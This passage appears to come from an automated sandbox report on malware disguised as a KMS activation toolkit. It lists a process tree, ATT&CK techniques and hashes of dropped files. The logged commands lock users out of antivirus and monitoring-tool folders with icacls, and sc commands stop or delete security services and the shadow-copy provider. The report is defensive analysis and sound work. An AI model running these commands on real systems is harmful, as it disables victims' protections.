        icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1652
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4404
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1040
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2740
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
      4⤵
      PID:1612
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:1836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4480
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4688
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:2272
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3392
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3168
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2100
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
      4⤵
      PID:1604
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3892
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1656
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
      4⤵
      PID:2284
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:4704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2868
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3444
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3088
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:980
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2448
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:824
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2316
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2152
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4552
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4652
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5056
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4092
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:32
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2348
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1976
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1900
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4424
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4376
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3380
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5060
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3560
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1048
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1608
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GPU Temp" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2848
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\GPU Temp" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:1668
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\CPUID\HWMonitor" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2904
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\CPUID\HWMonitor" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:1696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2368
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:1580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\QuickCPU" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4632
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\QuickCPU" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\NETGATE" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1656
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\NETGATE" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2160
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Wise" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2284
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Wise" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:1788
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ReasonLabs" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:440
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\ReasonLabs" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny %username%:(OI)(CI)F
      4⤵
      PID:3844
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny Admin:(OI)(CI)F
        5⤵
        Modifies file permissions
        
        PID:1148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)F
      4⤵
      PID:4504
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)F
        5⤵
        Modifies file permissions
        
        PID:2296
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny %username%:(OI)(CI)F
      4⤵
      PID:860
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny Admin:(OI)(CI)F
        5⤵
        
        PID:2288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      4⤵
      PID:3028
    - - C:\Windows\system32\sc.exe
        
        sc delete swprv
        5⤵
        Launches sc.exe
        
        PID:2800
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop mbamservice
      4⤵
      PID:1472
    - - C:\Windows\system32\sc.exe
        
        sc stop mbamservice
        5⤵
        Launches sc.exe
        
        PID:3888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
      4⤵
      PID:4436
    - - C:\Windows\system32\sc.exe
        
        sc stop bytefenceservice
        5⤵
        Launches sc.exe
        
        PID:3220
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
      4⤵
      PID:3268
    - - C:\Windows\system32\sc.exe
        
        sc delete bytefenceservice
        5⤵
        Launches sc.exe
        
        PID:3212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete mbamservice
      4⤵
      PID:3924
    - - C:\Windows\system32\sc.exe
        
        sc delete mbamservice
        5⤵
        Launches sc.exe
        
        PID:5004
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete crmsvc
      4⤵
      PID:4692
    - - C:\Windows\system32\sc.exe
        
        sc delete crmsvc
        5⤵
        Launches sc.exe
        
        PID:4676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Programdata\Install\Del3.bat
      4⤵
      PID:1612
    - - C:\Windows\system32\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:2516

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2cc 0x2f4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
- Drops file in Windows directory
PID:2732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:4452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1092

C:\Windows\SysWOW64\unsecapp.exe
"C:\Windows\SysWOW64\unsecapp.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1244

C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\RDP Wrapper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
C:\ProgramData\RDPWinst.exe

Filesize
1.4MB

MD5
3288c284561055044c489567fd630ac2

SHA1
11ffeabbe42159e1365aa82463d8690c845ce7b7

SHA256
ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

SHA512
c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

Download Submit
C:\ProgramData\Setup\Game.exe

Filesize
46.9MB

MD5
7a6c7625e24019f2a46076ff60ecc26d

SHA1
9e481000b3a70e728db804810ced880eb2b81aaf

SHA256
bbd90343cb97dbd4be2cbf7c013332a38edf423f9d419b19e3f95ef338869570

SHA512
7a9d8b9a7d974bcd7009bc9dd9fbcbf5aeba85f277fff386cee0678e5499e32cb2b42ab775b850a47887fdba2ec227c1efde60e2ef800c220d20a59ce2a58585

Download Submit
C:\ProgramData\Setup\IP.exe

Filesize
19.0MB

MD5
48d87a253517d7f5662a5a1b67611a68

SHA1
9c26a289701d5549d79034854b46e8a8a88aeb62

SHA256
9c5ca23df27a35bd532fdd8d5dcf43457d8ea8bdc6ee6a4a5866dc8ae7e425b1

SHA512
fa1bbc1836e099e7b323c39f816746c02318e6b22de571195c4a5fdc7ae42f0b810d85bfa93a638ba9d03389b1d9028df5558a8a2742bc2c1facc356c2f4e783

Download Submit
C:\ProgramData\Setup\KMS.exe

Filesize
5.5MB

MD5
f9659182b0bd73c5701d4b8e0d1ee6b1

SHA1
cead395d3f19efd537c7e3b5d8077e916215cb10

SHA256
cd7201cdef3bc02005ab104f4455c37cde22af193dd96b037f2ec0e9d9ca24f1

SHA512
02dadb1657754d30087735fdcccf601184a25067e1417edc54dd805b9fc5834a59da1147d7913665da0b08d55809e978866063a749f097ce0d8dfcd4bcd2c6e2

Download Submit
C:\ProgramData\Setup\smss.exe

Filesize
9.4MB

MD5
6fde344165a369c3586a68317279247c

SHA1
e39b5038f44757a7049c4ebabbd6f62deb280796

SHA256
90f414ca8e7fe410a19ea1be7895f8b7df55b35d4289f1bd7c8900b2c886f4b4

SHA512
880650d5db061a4aab3df0c99ed1871de4347fb6ed7305c596fa4b75ec57e9c7acecebeeef675ba864d727a898963fe397af08a5d71e7993289299764931349a

Download Submit
C:\ProgramData\Windows Tasks Service\settings.dat

Filesize
2KB

MD5
3c6c54a79899833338d91c8e9f011b8c

SHA1
408defd2789253a2bc465575f0471b28d06e65af

SHA256
f021c78aaa195ca0146cee9c8a553048df3e5cdf65f350add7cb761dfdd87e07

SHA512
a21222e6406e10cfb5b6f31ae31167fcc7617763f155c710b1f2e6b0fb055021de41d0df48067812d28efa845d5ce05b7426db2fd7ffa6d28df6bc4da34d590b

Download Submit
C:\ProgramData\Windows Tasks Service\winserv.exe

Filesize
10.2MB

MD5
3f4f5a6cb95047fea6102bd7d2226aa9

SHA1
fc09dd898b6e7ff546e4a7517a715928fbafc297

SHA256
99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98

SHA512
de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688

Download Submit
C:\ProgramData\WindowsTask\new.xml

Filesize
30KB

MD5
104654a02dd38ef5e30d90e54bb27847

SHA1
00979eb138abc3b4fd2868ca4e3add3292f715e1

SHA256
32cc16039aa8ca93aa65594c41910d74f0b546c40a03921e87307c80908eaef3

SHA512
85a37cdf6da0f6c0e8577c2a0a5d7e51a668d532fdb8eb8061af3b21a4c8407592d0830a11c612116690d831985b0860960c0e634cc83f0a2efb8a665133a750

Download Submit
C:\ProgramData\WindowsTask\winlogon.bat

Filesize
134B

MD5
4b09f42752d782958f48e3a4094fb235

SHA1
699cda02f1d20d720d3a24ab23c0700aee8f052e

SHA256
39128f3f6e8910fc7766da7eb80e5bea6b1c32cbd47ac6d1c7b60ee11d088ba9

SHA512
621532f1aee46a5bbe691a153092e721f36af827554b7211f34e56c0531a4c73569805d9d7ab86e571daed60966201bbdfcf8553a320f0c7da471096c0004542

Download Submit
C:\Programdata\Install\Del3.bat

Filesize
315B

MD5
72ee38ebb70f9f01e33fd62e454f635f

SHA1
95df0d6578e35145d37fcf1cf206b03d15d535c8

SHA256
27f348e1860ca50b0010baf70f5ecca0ad854b26a0d6ee10cdfd4883d085cceb

SHA512
e6186fb628950738ec36c95349ae194153dece4bdbc316570ef4d4402e553edf96f4ef47d7ac164c44ba65a989e5269c24a9be06305f4c60578bba1731db67ef

Download Submit
C:\Programdata\Install\del.bat

Filesize
315B

MD5
155557517f00f2afc5400ba9dc25308e

SHA1
77a53a8ae146cf1ade1c9d55bbd862cbeb6db940

SHA256
f00d027b0ed99814846378065b3da90d72d76307d37b7be46f5a480f425a764e

SHA512
40baee6e6b22c386886d89172ad7c17605166f992f2d364c68d90b9874ab6f7b85e0accc91e83b4fbd2ae702def365f23542f22f6be7ff2f7949496cc0ba8a32

Download Submit
C:\Programdata\Microsoft\temp\H.bat

Filesize
3KB

MD5
dc9fa52171eb0944c00164c6a046cb58

SHA1
b55cbc8422b4cc006fe47675b7d1b67cc02657e8

SHA256
c46aadd00d3a7b81a3910703cd109b86ec1d52cc08493a9d3ac757ec55046010

SHA512
82009d261a17c34f4652d1d383fff12ce0761fe8d7483cee20183c983bc01e947d1d2af97642476b23eb48485121adddfe9ad3319ceec3f0726826885a0de7fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe

Filesize
628KB

MD5
ec79cabd55a14379e4d676bb17d9e3df

SHA1
15626d505da35bfdb33aea5c8f7831f616cabdba

SHA256
44a55f5d9c31d0990de47b9893e0c927478930cef06fbe2d1f520a6d6cba587d

SHA512
00bbb601a685cbfb3c51c1da9f3b77c2b318c79e87d88a31c0e215288101753679e1586b170ccc9c2cb0b5ce05c2090c0737a1e4a616ad1d9658392066196d47

Download Submit
C:\Users\Admin\AppData\Local\Temp\KMS Tools Lite Portable\GSetup.exe

Filesize
19.2MB

MD5
c3c5adf650d5cf05bd1b08590d62cf53

SHA1
7781e1ecd78490ebaeb73314855efadff2bfeeed

SHA256
ed63b2a33066ef63bdb5b99c40d660f29653386b334f45d5296ead6fbcbc2861

SHA512
79550a7f9afccc4ee58e8f74df80653d566ceb067e9ef57baa8aeff14ace2f8730d8cc22d0fad523bb36dc6736cb112cbc21ecfe6cb657c7cd2d483026b84249

Download Submit
C:\Users\Admin\AppData\Local\Temp\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe

Filesize
9.6MB

MD5
a946712c1e450742997bf04899fa3ca9

SHA1
f52e30a14e8b9cc72d11c238a5e9b9e4ca23c414

SHA256
7af2fb51e09719a29915b53e205e6587f8bed175babb69ca959838e336e24ac2

SHA512
62faf3120fc81cfd5ae5c96864a0222944d942956ee58e7d24aa1f21b3fbe2ceeeeeb500c3eb911fa5d793cb13e5283b4106db87707db4fd61b4a3b70fddfe51

Download Submit
C:\Users\Admin\AppData\Local\Temp\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe

Filesize
2.2MB

MD5
dbfabf5db79b1f10d0190c241dfeda28

SHA1
ce807ea14cbe3c6e2c1697dc6927944abb96c9f9

SHA256
57fe3d39c4c7d7c4b1753b57cdf32bc0d90cef36cc6286eecb39ec157da15560

SHA512
a133a25fefd76730a12f6b35ca0707429d82b20f118a75326625a5ee2953222a1626ef4674681a42fde2724d1dd11a9a4ad5c8d5e4f1d799b0c6b8ab34b5c616

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1fw1lkgv.hlx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aut5EF5.tmp

Filesize
28.0MB

MD5
df00022673aef7242f6bdf5f72f4013d

SHA1
37bedd7e56ca5fd9b28dc2d69ac10f2c8814304a

SHA256
612527bed404d31980176a9f4e6b9f1855b60663f0ce066c3bc3756fcf9d5d82

SHA512
f2e55df33a8c32101f55b8ecda63b83f76ec1b26167d2a6feed943cb4f11f0aba56b5ec3c8e4c945064cf6c0a8e311efe12ce8e9ef84b21e564093cc6020f987

Download Submit
C:\Users\Admin\AppData\Local\Temp\data.pak

Filesize
15.1MB

MD5
6c82cca18f10641cfb82a3a79d3e67b8

SHA1
0b6706a3adf39ca0927acaa1fc0a839f59956c07

SHA256
4595203900ae2f65a165f3b6e3517700f2fa17139c50de47dc28bb40fd00a320

SHA512
f6769b4575dea3e6a3c77ddaf44552c30b7c8b57825145a960bfb88e5f3f80c196c98ba4a54d8f8c3abc913df7c9311bdb9b1c1263b9f020c3daccdae68b8c27

Download Submit
C:\Windows\SysWOW64\unsecapp.exe

Filesize
13.0MB

MD5
f41ac8c7f6f7871848ddb6fb718a15bb

SHA1
bce00d05c76d0a4eedbd76c2e87fc55c644edac0

SHA256
d30a26d6f6676d700f86db8ff522cccfea285e1272f2dba210cf99c3b676a773

SHA512
62316becb846b12396401fdb79c14ada97495abdd241fe4815c963d6ea315989bc6f283ff68c17cd90e5b62d3ea025770f4883b2b1f387d0dbe2d41a1c541ba6

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
3KB

MD5
dda38d0a02ece7d747afcd3085fd9515

SHA1
7d8fc89118bdc417a1c57a6f59b538449248de99

SHA256
9778603aa4a32103bd3ab43c46fd9d55674487de857a560bcda0e6661299dae0

SHA512
d208692ea314ff5d396097fae1d10464c631d2b91e0f45de3758da0d462b44cca89b67d89f8f346df805d081b116d81f01e983c45606bf0e91ec3de8ddde7c30

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
445KB

MD5
db371f45b6f6563fa8d4410e5efd9a9a

SHA1
d33d1c9c6e4b3fc8514dae70519daf53653d707f

SHA256
fdb3ea405adfe7885578ce70c3c7bdb99a6fdb4c6cd040535481afffde8e340f

SHA512
4f5563c387041a335196e5d16afbb1406094d2d330df865db9c64f9e7a6de5a11bb42aa01c6c394f8ee40dcbe522beaa741e53ed429aecea22302f0334c80882

Download Submit
memory/988-221-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp

Filesize
22.0MB

Download
memory/988-220-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp

Filesize
22.0MB

Download
memory/988-226-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp

Filesize
22.0MB

Download
memory/988-227-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp

Filesize
22.0MB

Download
memory/988-223-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp

Filesize
22.0MB

Download
memory/988-222-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp

Filesize
22.0MB

Download
memory/988-225-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp

Filesize
22.0MB

Download
memory/988-330-0x00007FF7B5D00000-0x00007FF7B72FE000-memory.dmp

Filesize
22.0MB

Download
memory/1844-179-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp

Filesize
26.4MB

Download
memory/1844-254-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp

Filesize
26.4MB

Download
memory/1844-182-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp

Filesize
26.4MB

Download
memory/1844-181-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp

Filesize
26.4MB

Download
memory/1844-183-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp

Filesize
26.4MB

Download
memory/1844-184-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp

Filesize
26.4MB

Download
memory/1844-178-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp

Filesize
26.4MB

Download
memory/1844-180-0x00007FF69FF60000-0x00007FF6A19BE000-memory.dmp

Filesize
26.4MB

Download
memory/2720-133-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp

Filesize
16.0MB

Download
memory/2720-170-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp

Filesize
16.0MB

Download
memory/2720-57-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp

Filesize
16.0MB

Download
memory/2720-79-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp

Filesize
16.0MB

Download
memory/2720-58-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp

Filesize
16.0MB

Download
memory/2720-61-0x00007FF71FEA0000-0x00007FF720EA0000-memory.dmp

Filesize
